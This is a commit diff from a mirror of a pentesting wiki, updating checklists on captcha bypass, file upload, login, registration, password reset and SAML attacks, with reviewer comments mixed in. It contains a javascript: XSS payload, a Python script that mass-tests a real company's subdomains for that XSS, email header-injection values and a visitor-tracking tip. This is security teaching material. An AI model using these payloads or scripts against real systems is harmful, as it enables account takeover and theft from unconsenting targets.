mirror of https://github.com/carlospolop/hacktricks.git synced 2023-12-14 19:12:55 +01:00

GitBook: [master] 7 pages and 2 assets modified

This commit is contained in:
CPol 2021-06-27 15:43:01 +00:00 committed by gitbook-bot
parent 82dac477c6
commit 2e5398ac23
No known key found for this signature in database
GPG key ID: 07D2180C7B12D0FF
9 changed files with 102 additions and 6 deletions

View file

@ -229,7 +229,7 @@ puredns bruteforce all.txt domain.com
Note how these tools require a **list of IPs of public DNSs**. If these public DNSs are malfunctioning \(DNS poisoning for example\) you will get bad results. In order to generate a list of trusted DNS resolvers you can download the resolvers from [https://public-dns.info/nameservers-all.txt](https://public-dns.info/nameservers-all.txt) and use [**dnsvalidator**](https://github.com/vortexau/dnsvalidator) to filter them.
### VHosts
### VHosts / Virtual Hosts
#### IP VHosts
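Review bot: renaming the heading from `### VHosts` to `### VHosts / Virtual Hosts` changes the anchor the renderer derives from it, so any existing link to `#vhosts` elsewhere in the book will silently break; grep the other pages for links to the old anchor and update them in the same commit.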
@ -246,6 +246,9 @@ wfuzz -c -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-2
#From https://github.com/allyshka/vhostbrute
vhostbrute.py --url="example.com" --remoteip="10.1.1.15" --base="www.example.com" --vhosts="vhosts_full.list"
#https://github.com/codingo/VHostScan
VHostScan -t example.com
```
{% hint style="info" %}
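Review bot: the two added comment lines use different styles (`#From https://...` versus a bare `#https://...`), and the vhostbrute invocation mixes `example.com` with a private `--remoteip="10.1.1.15"` and an unexplained `vhosts_full.list`; use one comment form (`# From <url>`) and point `--vhosts` at the same SecLists wordlist the wfuzz line above already uses so the three examples are consistent.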

View file

@ -5,9 +5,12 @@
To **automate** the **testing** of some functions of the server that allows user input it **could** be **needed** to **bypass** a **captcha** implementation. Test these things:
* **Do not send the parameter** related to the captcha.
* Change from POST to GET or other HTTP Verbs
* Change to JSON or from JSON
* Send the **captcha parameter empty**.
* Check if the value of the captcha is **in the source code** of the page.
* Check if the value is **inside a cookie.**
* Try to use an **old captcha value**
* Check if you can use the **same** captcha **value** several times with **the same or different sessionID.**
* If the captcha consists on a **mathematical operation** try to **automate** the **calculation.**
* If the captcha consists on **read characters from an image**, check manually or with code **how many images** are being used and if only a **few images are being used, detect them by MD5.**
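Review bot: the new bullets need a grammar pass before they read cleanly: `consists on` should be `consists of` (twice), `read characters from an image` should be `reading characters from an image`, and `Change to JSON or from JSON` is too vague to act on; say what is meant, e.g. `Switch the request body between form-encoded and JSON`. The bold is also applied to arbitrary words mid-sentence (`**could** be **needed**`), which hurts readability; bold only the check itself.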

View file

@ -129,6 +129,8 @@ Note that **another option** you may be thinking of to bypass this check is to m
* If you can **indicate the web server to catch an image from a URL** you could try to abuse a [SSRF](../ssrf-server-side-request-forgery.md). If this **image** is going to be **saved** in some **public** site, you could also indicate a URL from [https://iplogger.org/invisible/](https://iplogger.org/invisible/) and **steal information of every visitor**.
* [**XXE and CORS** bypass with PDF-Adobe upload](pdf-upload-xxe-and-cors-bypass.md)
* Specially crafted PDFs to XSS: The [following page present how to **inject PDF data to obtain JS execution**](../xss-cross-site-scripting/pdf-injection.md). If you can upload PDFs you could prepare some PDF that will execute arbitrary JS following the given indications.
* Upload the ****[**eicar**](https://secure.eicar.org/eicar.com.txt) content to check if the server has any **antivirus**
* Check if there is any **size limit** uploading files
Heres a top 10 list of things that you can achieve by uploading \(from [link](https://twitter.com/SalahHasoneh1/status/1281274120395685889)\):
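Review bot: the eicar bullet starts with a stray `****` (an empty bold span left behind by the editor) before the link, which renders as literal asterisks in some Markdown engines; drop it. In the context line below, `Heres` needs its apostrophe (`Here's`).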
@ -143,6 +145,10 @@ Heres a top 10 list of things that you can achieve by uploading \(from [link]
9. **ZIP**: RCE via LFI / DoS
10. **PDF / PPTX**: SSRF / BLIND XXE
### Burp Extension
{% embed url="https://github.com/portswigger/upload-scanner" %}
## Magic Header Bytes
* **PNG**: `"\x89PNG\r\n\x1a\n\0\0\0\rIHDR\0\0\x03H\0\xs0\x03["`
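Review bot: the PNG entry is not a magic-byte signature and contains an invalid escape. `\xs0` is not a hex escape and will not parse in any language that interprets the string, and only the first eight bytes (`\x89PNG\r\n\x1a\n`) are the PNG signature; the remainder (`\0\0\0\rIHDR` followed by a width and height) is the IHDR chunk of one particular image and will not match other PNGs. List just the 8-byte signature, or label the longer string as a sample header rather than a magic value.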

View file

@ -66,3 +66,16 @@ pwd))
admin))(|(|
```
### Remember Me
If the page has "**Remember Me**" functionality check how is it implemented and see if you can abuse it to **takeover other accounts**.
### Redirects
Pages usually redirects users after login, check if you can alter that redirect to cause an [**Open Redirect**](../open-redirect.md). Maybe you can steal some information \(codes, cookies...\) if you redirect the user to your web.
## Other Checks
* Check if you can **enumerate usernames** abusing the login functionality.
* Check if **auto-complete** is active in the password/**sensitive** information **forms** **input:** `<input autocomplete="false"`
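Review bot: the auto-complete bullet checks for the wrong value: `false` is not one of the values defined for the `autocomplete` attribute, and the standard way to disable browser autofill is `autocomplete="off"`, so the check should be whether `autocomplete="off"` is missing on password and sensitive fields; the snippet is also missing its closing `>`. Minor grammar in the new text: `check how is it implemented` should be `check how it is implemented`, and `Pages usually redirects users` should be `Pages usually redirect users`.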

View file

@ -11,7 +11,8 @@
* add some some in the email
* special characters in the email name \(%00, %09, %20\)
* Put black characters after the email: `test@test.com a`
*
* victim@gmail.com@attacker.com
* victim@attacker.com@gmail.com
### Username Enumeration
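Review bot: `add some some in the email` is garbled and it is not clear what the reader should try; `Put black characters` should be `blank characters` given the `test@test.com a` example; and the bare `*` line is an empty list item that renders as a blank bullet, so either fill it in or remove it.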
@ -30,13 +31,18 @@ In that case you may try to bruteforce credentials.
{% page-ref page="oauth-to-account-takeover.md" %}
### Redirects
### SAML Vulnerabilities
Pages usually redirects users after login, check if you can alter that redirect to cause an [**Open Redirect**](open-redirect.md).
{% page-ref page="saml-attacks/" %}
### Change Email
when registered try to change the email and check if this change is correctly validated or can change it to arbitrary emails.
## More Checks
* Check if you can use **disposable emails**
* **Long** **password** \(&gt;200\) leads to **DoS**
* **Check rate limits on account creation**
* Use username@**burp\_collab**.net and analyze the **callback**
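Review bot: the `### Redirects` subsection removed here reappears in the login-bypass file earlier in this commit, so the move itself is consistent, but the new `### Change Email` paragraph needs tidying: start with a capital (`Once registered`), and `or can change it to arbitrary emails` has no subject, e.g. `check whether the change is validated or whether the address can be set to an arbitrary email`. The `More Checks` list also overlaps with the `Extra Checks` list added to the reset-password file in this same commit (burp_collab callback, long-password DoS); keep one copy and link to it.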

View file

@ -162,8 +162,6 @@ POST /api/changepass
### No Rate Limiting: Email Bombing <a id="5-no-rate-limiting-email-bombing"></a>
![](https://www.howtogeek.com/thumbcache/2/200/5b21f5dc5ea2ab9cc8ec78b8cc2e437e/wp-content/uploads/2019/04/email-bomb.jpg)
### Exploitation
* Start the Burp Suite and Intercept the password reset request
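Review bot: removing the hotlinked howtogeek thumbnail is the right call, since external thumbcache URLs rot and the book should not depend on third-party image hosts. The heading still carries a hand-written `<a id="5-no-rate-limiting-email-bombing">` whose `5-` prefix reflects numbering from the original source rather than this page; consider dropping it and relying on the generated heading anchor.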
@ -246,3 +244,20 @@ email=victim@email.com&code=$YOUR_TOKEN$
* https://twitter.com/HusseiN98D/status/1254888748216655872/photo/1
## Session I**nvalidation** in Logout/Password Reset
When a user **logs out or reset his password**, the current session should be invalidated.
Therefore, **grab the cookies** while the user is logged in, **log out**, and **check** if the **cookies** are still **valid**.
Repeat the process **changing the password** instead of logging out.
## Reset Token expiration Time
The **reset tokens must have an expiration time**, after it the token shouldn't be valid to change the password of a user.
## Extra Checks
* Use username@burp\_collab.net and analyze the callback
* User carbon copy email=victim@mail.com%0a%0dcc:hacker@mail.com
* Long password \(&gt;200\) leads to DoS
* Append second email param and value
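Review bot: the new heading `## Session I**nvalidation** in Logout/Password Reset` has the bold markers inside the word and will render as `Session I` followed by a bold `nvalidation`; move them outside the word or drop them. `User carbon copy` should read `Use carbon copy`, `reset his password` should be `resets their password`, and `Reset Token expiration Time` has inconsistent capitalisation. The `Extra Checks` bullets on the burp_collab callback and long-password DoS duplicate the registration page's `More Checks` list added in this same commit.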

View file

@ -4,6 +4,14 @@
{% page-ref page="saml-basics.md" %}
## Attacks Graphic
![](../../.gitbook/assets/image%20%28554%29.png)
## Tool
\*\*\*\*[**SAMLExtractor**](https://github.com/fadyosman/SAMLExtractor): A tool that can take a URL or list of URL and prints back SAML consume URL.
## XML Signature Wrapping Attacks
XML documents containing XML Signatures are typically **processed in two independent steps**: **signature** **validation** and **function** **invocation** \(business logic\). If both modules have different views on the data, a new class of vulnerabilities named XML Signature Wrapping attacks \(XSW\) exists.
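Review bot: the `## Tool` line begins with `\*\*\*\*`, four backslash-escaped asterisks that render as a literal `****` before the SAMLExtractor link; remove them. The description also needs `a URL or list of URL` changed to `a URL or a list of URLs` and `prints back SAML consume URL` to `prints the SAML consume URL for each`.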
@ -189,6 +197,48 @@ SAML Token Recipient Confusion \(SAML-TRC\) has a few prequisite conditions in o
The attack is relatively simple if the conditions are true. We **authenticate** to **SP-Legit** via the shared Identity Provider. We then **intercept the SAML Response on its way from the IdP to SP-Legit**. Once intercepted, we send the **SAML Response that was intended for SP-Legit to SP-Target instead.** If **SP-Target accepts the Assertion**; well find ourselves logged in with the same account name as we have for SP-Legit and get access to SP-Targets corresponding resources.
## XSS in Logout functionality
\(Access the [original research here](https://blog.fadyothman.com/how-i-discovered-xss-that-affects-over-20-uber-subdomains/)\)
After performing the directory brute forcing I found the following page:
```text
https://carbon-prototype.uberinternal.com:443/oidauth/logout
```
It's a logout page, I opened the above link and it did redirect me to the following page
```text
https://carbon-prototype.uberinternal.com/oidauth/prompt?base=https%3A%2F%2Fcarbon-prototype.uberinternal.com%3A443%2Foidauth&return_to=%2F%3Fopenid_c%3D1542156766.5%2FSnNQg%3D%3D&splash_disabled=1
```
The base parameter is taking a URL so how about replacing that with the old classic `javascript:alert(123);` to trigger an XSS.
### Mass Exploitation
Using [**SAMLExtractor**](https://github.com/fadyosman/SAMLExtractor) that can take a list of URLs and then give you back the callback \(SAML consume\) URL, I decided to feed the tool with all subdomains of `uberinternal.com` to see if there are other domains that use the same library and there was.
What I did next was to create a script that calls the vulnerable page `oidauth/prompt` and try the XSS and if my input is reflected it gives me a nice vulnerable message.
```python
import requests
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
from colorama import init ,Fore, Back, Style
init()
with open("/home/fady/uberSAMLOIDAUTH") as urlList:
for url in urlList:
url2 = url.strip().split("oidauth")[0] + "oidauth/prompt?base=javascript%3Aalert(123)%3B%2F%2FFady&return_to=%2F%3Fopenid_c%3D1520758585.42StPDwQ%3D%3D&splash_disabled=1"
request = requests.get(url2, allow_redirects=True,verify=False)
doesit = Fore.RED + "no"
if ("Fady" in request.content):
doesit = Fore.GREEN + "yes"
print(Fore.WHITE + url2)
print(Fore.WHITE + "Len : " + str(len(request.content)) + " Vulnerable : " + doesit)
```
## References
The attacks were obtained from [https://epi052.gitlab.io/notes-to-self/blog/2019-03-13-how-to-test-saml-a-methodology-part-two/](https://epi052.gitlab.io/notes-to-self/blog/2019-03-13-how-to-test-saml-a-methodology-part-two/)
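Review bot: the XSS section describes the finding but never states the root cause or the fix, which is what a reader hardening a similar logout flow needs: the `base` parameter is accepted as an arbitrary URL and rendered back, so it should be validated against an allow-list of the expected `https://` origins, with `javascript:` and other non-http schemes rejected, before use. The script is also Python 2 only: in Python 3 `request.content` is `bytes`, so `"Fady" in request.content` raises `TypeError`; compare against `request.text` instead. The hard-coded `/home/fady/uberSAMLOIDAUTH` path should be a command-line argument, and `init ,Fore` has a misplaced space.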